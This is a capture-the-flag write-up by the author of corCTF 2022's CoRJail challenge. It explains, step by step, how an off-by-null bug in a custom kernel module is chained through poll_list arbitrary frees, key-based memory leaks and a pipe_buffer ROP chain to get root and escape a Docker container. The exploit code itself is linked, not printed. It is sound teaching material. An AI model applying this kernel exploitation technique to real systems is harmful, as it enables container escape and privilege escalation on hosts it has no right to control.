CoRJail is a kernel exploitation / Docker escape challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters exploiting a Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. With this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from a nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!
Last year FizzBuzz101 and me, designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. During this year, the technique has been extensively used in real world exploits and later extended to be used with FUSE instead of userfaultfd.
For corCTF 2022, we decided to do the same, designing two challenges of which solutions required a novel approach. I decided to write a kernel exploitation / Docker escape challenge, CoRJail, demonstrating a novel technique I originally used to compromise Google’s kCTF Kubernetes infrastructure. This novel approach allows to get a powerful arbitrary free primitive in almost every general purpose cache exploiting poll_list objects. FizzBuzz101 instead, designed a challenge, Cache of Castaways, of which solution required a cross-cache overflow into cred_jar to corrupt current task’s cred structure and get root privileges.
CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image (improperly called CoROS :P). The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing access to the Linux Kernel Key Retention Service from within the container. The custom seccomp profile can be found here.
The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.
All modern protections, like
CONFIG_SLAB_FREELIST_HARDENED etc. were enabled.
CONFIG_STATIC_USERMODEHELPER was set to true, forcing usermode helper calls through a single binary and
CONFIG_STATIC_USERMODEHELPER_PATH was set to an empty string. In other words, no modprobe_path trick. Finally, I unset
CONFIG_KALLSYMS_ALL, making many symbols not available in /proc/kallsyms.
The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs interface, was created to actually display per-CPU syscall count, restricting the displayed result only to syscalls specified in a filter.
Users were allowed to set a new filter using
echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon. For example, to get per-CPU usage count of read() and write() a user can simply use
echo -n 'sys_read,sys_write' > /proc_rw/cormon.
The default CoRMon filter was actually a hint, indeed it displayed many syscalls I used in my exploit: poll(), keyctl() and setxattr().
If you want to try to solve the challenge before reading the rest of the article, you can find it in the corCTF 2022 Public Archive. Please note that I could not upload the coros.qcow2 image on Github because of its size, so you will need to build it yourself using the provided script.
Exploit a Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get OOB Read. Leak heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key and guess the correct options on the CoR Flag License Website to get the actual flag.
It’s Only A Zero, What Could Go Wrong?
Given the complexity of the exploitation phase and the 48 hours limit, I decided to make the bug extremely easy to spot and trigger. On the other hand I decided to not provide source code, considering the reverse engineering process would not have taken too long. Here is the original CoRMon source code:
We can interact with the module through a procfs interface using read() and write(). When we use write() the cormon_proc_write() function is called to process the user input. The cormon_seq_show() function instead, is used to display syscalls information when we use read().
As we can see, there is a clear Off-By-Null in cormon_proc_write(). Let’s extract the function from source code and ignore the rest:
If the number of bytes written is greater than PAGE_SIZE (4096) then the len variable is set to PAGE_SIZE - 1, otherwise it is set to count. 
Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k  and the list of syscalls is copied from user-space to kernel-space: it will be parsed by the update_filter() function.  The list, now copied in kernel-space, is subsequently null terminated. 
The check is clearly not covering the case where the number of bytes written is equal to PAGE_SIZE. Indeed, in that case, len would be equal to count, and the line
syscalls[len] = '\x00', would result in
syscalls = '\x00', causing the null byte to be written out of bounds.
Apparently, considering the hardened kernel and the limited attack surface from within the container, a single zero written out of bounds, does not seem too dangerous, but as we are going to demonstrate, it will be more than enough to escape from the container and get root privileges on the host.
A Dive Into poll_list Objects
As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces and this prevents us from accessing many kernel features. Many other syscalls are also blocked, including msgget(), msgsnd() and msgrcv(), so for this time the old good msg_msg will be left out of the picture. Instead, our exploitation process will mainly rely on poll_list objects. This structure can be used from within the container without having to meet any specific requirements.
The technique we will cover in this article, is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, here instead we only have a single null byte written out of bounds.
poll() accepts three arguments:
- fds: an array of pollfd structures.
- nfds: the number of pollfd structures in the fds array.
- timeout: the number of milliseconds for an event to occur.
The poll_list structure, is composed by a pointer to the next poll_list , a length field, corresponding to the number of pollfd structures in the entries array , and entries, a flexible array of pollfd structures . Each entry is 8 bytes in size.
When we use the poll() syscall, do_sys_poll() is called in kernel-space. This function is responsible for copying the entries we passed to poll() in the fds array from user-space to kernel-space:
do_sys_poll() has two paths, a fast path, and a slow one. As we can see at the beginning of the function, stack_pps , a buffer of 256 bytes, is defined. It is used to store the first 30 pollfd entries . This is the fast path: entries are stored on the stack to save memory and improve speed.
If we submit more than 30 pollfd entries, we enter the slow path, and the remaining ones will be allocated on the kernel heap. This means that if we do the math correctly, controlling the number of monitored file descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k. 
It is possible to allocate a maximum of POLLFD_PER_PAGE (510) entries per page.  If this limit is exceeded, a new poll_list is allocated to store the remaining entries and it is connected to the previous one in a singly linked list. The for loop will continue until all entries have been stored in kernel memory.
Let’s say for example we call poll(), providing 510 + 1 file descriptors to the syscall. This, in kernel space, will result in a poll_list with 510 entries allocated in kmalloc-4k and a second poll_list with a single entry allocated in kmalloc-32. The structures will be connected in a singly linked list:
After all poll_list objects have been allocated, there is a call to do_poll() : it will monitor provided file descriptors until a specific event occurs or the timer expires. The end_time variable here, corresponds to the timeout variable we passed as third argument to the poll() syscall. This means that poll_list objects can be kept in memory for an arbitrary amount of time, then, when timer expires, they will be automatically freed.
The very interesting part, is how poll_list structures are freed: a while loop is used to traverse the singly linked list, freeing each of them.  Now let’s look at what we have from an attacker’s prospective.
We have a structure that can be allocated in multiple caches, ranging from kmalloc-32 to kmalloc-4k, and the object pointed by its next field (first QWORD) is automatically freed when a timer, that we control, expires. This means that given a Out-Of-Bounds Write or a Use-After-Free Write primitive we can overwrite the next field of a poll_list structure with the address of a target object. Once the timer expires, that object will be automatically freed.
The only constraint, is that we need to make sure the first QWORD of the target object is NULL, otherwise the while loop, will treat it as a valid pointer, trying to traverse the list. This is not a problem, we can use a misaligned arbitrary free primitive or we can simply target objects of which first QWORD is equal to zero.
In the specific case of kmalloc-4k, if the poll_list next field already contains a valid pointer to another poll_list, we can corrupt it with a partial overwrite (even with a single byte), making it point to another object. When timer expires, the kernel will be tricked into freeing the wrong object. This trick, is exactly what we are going to use in our exploit.
The following code can be used to allocate poll_list structures in kernel space. Note that we need to use threads to spray this object because the poll() syscall will block until a specific event occurs or timer expires.
The Exploit - From Zero To Information Leak
The strategy we are going to use in the first part of the exploit, consists of utilizing the Off-By-Null in kmalloc-4k to corrupt the next field of a poll_list structure chained to another one in kmalloc-32, making the corrupted pointer point to another object in the slab. When the timer expires, that object will be automatically freed.
We need to choose a target structure that once arbirarily freed, can be corrupted and can give us a Out-Of-Bounds Read primitive, with subsequent information leak. There are multiple elastic objects in the Linux kernel that may do the trick. A good candidate could be simple_xattr, but we need the first QWORD of the target object to be NULL, so we cannot use it. Since add_key() and keyctl() are not blocked by the custom seccomp profile, we can opt for user_key_payload instead.
The problem with this structure, is that its first member,
struct rcu_head rcu, is not initialized, and since the structure is allocated with kmalloc, the first QWORD might not be NULL. A practical solution comes from setxattr(): we can use it to fill the chunk with zeros before allocating a user key.
With setxattr(), we can allocate a chunk of arbitrary size  and fill it with arbitrary data , then, it will be automatically freed right before the function returns . We can exploit this function to make sure the uninitialized member of user_key_payload is actually zero. We simply need to call setxattr() right before alloc_key(): because of freelists LIFO behavior, once the chunk used by setxattr() is allocated, filled with zeros and then freed, it will be reused by the user key. With this in mind, we can start writing our exploit:
First, we assign the current process to core 0 using assign_to_core() (a sched_setaffinity() wrapper), since we are working in a multi-core environment and slabs are per-CPU.  Then, we start spraying many seq_operations structures in kmalloc-32 to fill partial slabs, so the next allocations will end up in a brand new slab. 
We proceed using alloc_key() (a simple add_key() wrapper) to spray many user_key_payload structures in kmalloc-32.  As explained above, we use setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.
Now we finally spray poll_list structures in kmalloc-4k, chained to poll_list in kmalloc-32.  At this point the situation in memory will probably be similar to [Fig. 1A], with unallocated chunks in white, poll_list in green, and user_key_payload in orange.
We can continue spraying more user keys in kmalloc-32, to completely saturate the slab.  [Fig. 1B]
We are ready to trigger the Off-By-Null bug, hijack a poll_list next pointer and trigger the arbitrary free:
We can trigger the allocation of a chunk in kmalloc-4k simply writing 4096 bytes to the CoRMon procfs interface.  This will also cause a null byte to be written out of bounds, and will corrupt the next object in memory. Since we sprayed poll_list structures in kmalloc-4k, and each one has a pointer to a poll_list in kmalloc-32, we will be able to corrupt one of the pointers, making it point to one of the user keys we sprayed in the previous step. [Fig. 2A]
Now we can simply use join_poll_threads() and wait until timers expire and poll_list objects are automatically freed.  Since we corrupted one of the singly linked lists, a user_key_payload will be arbitrarily freed. [Fig. 2B]
We caused a potential Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain a Out-Of-Bounds Read primitive:
First, we spray many seq_operations structures in kmalloc-32. One of them will overwrite the user key we freed in the previous step, corrupting its len field (an unsigned short) with the two lower bytes of the single_next pointer. In our case, the two lower bytes of single_next are
0x4330, so this will give us a huge Out-Of-Bounds Read primitive. A proc_single_show() pointer instead, will overwrite the data field of the user key.  You can see the seq_operations structures in yellow in [Fig. 3A], one of them corrupted the key.
We can now use the leak_kernel_pointer() function and iterate through all the keys until we leak the proc_single_show address, this way we will identify the corrupted key and we will be able to calculate the kernel base address.  Now we need to reuse the Out-Of-Bounds Read primitive to leak a heap address.
When we open a ptmx, two structures of our interest are allocated, the well known tty_struct in kmalloc-1024 and another one, tty_file_private in kmalloc-32. Each tty_file_private structure, has a pointer to relative tty_struct, this means that leaking a tty_file_private in kmalloc-32 we can obtain the address of a tty_struct object in kmalloc-1024.
We can free all the keys in kmalloc-32 (orange chunks in [Fig. 3A]),  with the exception of the corrupted key, and replace them with tty_file_private structures (blue chunks in [Fig. 3B]), opening many ptmx devices.  Then we call leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak the address of a tty_struct object.  [Fig. 3B]
The Exploit - Hijacking Control Flow
We have made some progress: from a single Null Byte Overflow now we know the kernel base address and the address of an object in kmalloc-1024. Now we need to arbitrarily free this object.
First, we free all the seq_operations structures in kmalloc-32 (yellow chunks in [Fig. 3A-3B]) , then we replace them with poll_list objects (green chunks in [Fig. 4A]) . Note that the seq_operations structure used to corrupt the user key is also freed and it is also replaced by a poll_list structure. [Fig. 4A]
Now we free the corrupted key, causing a potential Use-After-Free situation over the poll_list.  To exploit the Use-After-Free, we reuse the setxattr() trick used in the first stage, but this time, instead of zeroing out the chunk, we set its first QWORD to
target object - 0x18 bytes , then we allocate a user_key_payload structure to consolidate the setxattr buffer in memory. In other words, since the chunk used by setxattr is automatically freed when the function returns, we allocate a user key (remember, the first member of a user_key_payload structure is not initialized) to prevent the first QWORD we just set with setxattr from being overwritten by a subsequent allocation.  Doing so, we will to overwrite the next field of the poll_list structure in kmalloc-32 with the address of our target object minus 0x18 bytes. [Fig. 4B]
Originally my goal was to arbitrarily free a tty_struct and get RIP control overwriting its tty_operations pointer. Then I changed my mind (too many checks!), and I decided to target a pipe_buffer structure.
We proceed freeing all the TTYs, closing the ptmx devices , then we spray many pipe_buffer objects . This way we replace all the tty_struct with pipe_buffer in kmalloc-1024. Then, we wait until timers expire, and the pipe_buffer object pointed by the next field of the corrupted poll_list, is automatically freed. [Fig. 5.A]
Finally, we free all user keys, and we reallocate them in kmalloc-1024: we use them to spray our ROP-chain.  One of the key payloads will overwrite the target pipe_buffer, overwriting the anon_pipe_buf_ops pointer with a stack pivot gadget. Now we only need to close all pipes, triggering the call to pipe_release().  This, will execute our stack pivot gadget and we will be finally able to hijack control flow. [Fig. 5B]
The Exploit - Escaping From The Container
We started with a single Off-By-One vulnerability and we finally managed to hijack control flow. The last piece of the puzzle is the ROP-chain to use to escape from the container. Let’s take a look to what I used in the exploit:
The first part of the ROP-chain has nothing special. We use a stack pivot gadget to hijack control flow , then prepare_kernel_cred()  and commit_creds()  to escalate privileges, and then we locate the Docker container task using find_task_by_vpid()  and we use switch_task_namespaces()  to replace its nsproxy structure with init_nsproxy. Unfortunately, in this case, this is not enough to escape from the container.
In Docker containers, unlike Google’s kCTF, setns() is blocked by default by seccomp, this means that we cannot use it to enter another namespace after we returned in user-space. We need to find an alternative approach, and we need to implement it in the ROP-chain.
Reading the setns() source code, we can see that it calls commit_nsset() to actually move the task into a different namespace. We can reproduce part of its behavior using copy_fs_struct() to clone the init_fs structure , then we locate the current task using find_task_by_vpid()  and we manually install the new fs_struct using a write-what-where gadget.  Finally, we can use the KPTI trampoline with swapgs_restore_regs_and_return_to_usermode to get a shell on the host.  Here is the final exploit in action:
As you can see, the flag file did not contain a real flag, but a weird message:
Hello Hacker. Unfortunately, the flag you are looking for is not here. You need a CoR Flag License to unlock it. Please visit https://flag-license.cor.team to buy one. Use the CoR Promo Code WINDOWSISMYLIFE-06612CF0B3DC2776 to get a $0.99 discount. Regards, The CoR Team.
I wanted to insert a small Easter egg in the challenge, so I created a fake website. Users were asked to visit https://flag-license.cor.team (note that at time of writing the website is still up, but when you read the article it might be down) and fill a CoR Flag License Purchase Form to buy a CoR Flag License for the modest price of $1337.00/day. The CoR Promo Code
WINDOWSISMYLIFE-06612CF0B3DC2776 (cough cough …note the sarcasm… cough cough) is the lucky one, and the player who uses it wins a free CoR Flag License. The license code, can later be used to unlock the real flag.
The final exploit can be found here: corjail_exploit.c.
Note: In the exploit I use the assign_to_core() function to assign the process to another core before creating poll threads. This is useful to reduce noise due to thread creation on core 0 slabs. Once a thread has been created, it is assigned back to core-0 right before the poll() call using assign_thread_to_core(), a pthread_attr_setaffinity_np() wrapper.
poll_list objects, can be used to get a powerful arbitrary free primitive in almost every general purpose cache. Many recent vulnerabilities can be exploited using this structure in complete absence of msg_msg objects.
This challenge was an hard one and considering the 48 hours limit and the presence of other hard challenges, it only had one solver. A big shout out goes to Kylebot for getting first blood. It turns out that Extended security attributes were usable inside the container without requiring any special capability. So he could solve the challenge transforming the Off-By-Null in kmalloc-4k into a Cross-Cache Null Byte Overflow, targeting the list.next pointer of a simple_xattr structure in kmalloc-192.
This cache is unaligned, so he made the corrupted pointer point in middle of another simple_xattr object in the same slab. Here, he forged a fake header and obtained a Out-Of-Bounds Read primitive. This led to an information leak.
Finally, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach! Isn’t it?
If you have any question or need any clarification, feel free to contact me. You can find my contact information in About.
You can download CoRJail from the corCTF 2022 Public Archive.
Syscall statistics patch
Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
- https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)
Unlinking attack with simple_xattr